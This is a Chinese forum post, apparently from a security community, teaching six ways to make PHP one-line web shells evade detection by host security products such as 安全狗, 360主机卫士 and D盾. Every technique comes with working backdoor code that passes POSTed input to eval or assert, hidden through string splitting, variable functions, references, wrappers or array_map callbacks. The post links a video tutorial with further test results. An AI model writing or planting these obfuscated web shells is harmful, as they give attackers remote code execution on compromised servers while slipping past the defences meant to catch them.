这个绝对原创! + 首发!
个人认为免杀大致分为这几个方面:
1.关键字拆分。
比如assert,可以写成 ‘a‘.‘ss‘.‘e‘.‘r‘.‘t‘这样。
2.可变变量、引用、可变函数。
可变变量 比如$a=$_POST[‘x‘];$b=‘a‘;@eval($$b);
引用 比如$a=$_POST[‘x‘];$b=&$a;@eval($b);
可变函数 比如$a=‘a‘.‘ss‘.‘e‘.‘r‘.‘t‘;$a($_POST[‘x‘]);
3.添加其他代码。
添加其他代码 比如 if(empty($a))
{
$a=$_POST[‘x‘];
}
@eval($a);
4.函数替换。
使用其他函数,比如eval可以使用assert替换。
5.封装到新的函数中。
新定义一个函数,使其封装到新函数中。
function test($a){ //定义一个名为test的函数,并使用$a接受参数
eval($a);
}
test($_POST[‘x‘]);
6.函数回调。
使用其他函数进行调用,并执行。
如:array_map(‘a‘.‘s‘.‘se‘.‘r‘.‘t‘,array($_POST[‘x‘]));
详细教程 + 测试结果(安全狗+360主机卫士+D盾) 请看视频教程。
视频教程下载地址:http://pan.baidu.com/s/1boKws83
本文来源地址:http://bbs.ichunqiu.com/thread-8964-1-1.html?from=bjy
时间: 2024-11-06 22:24:35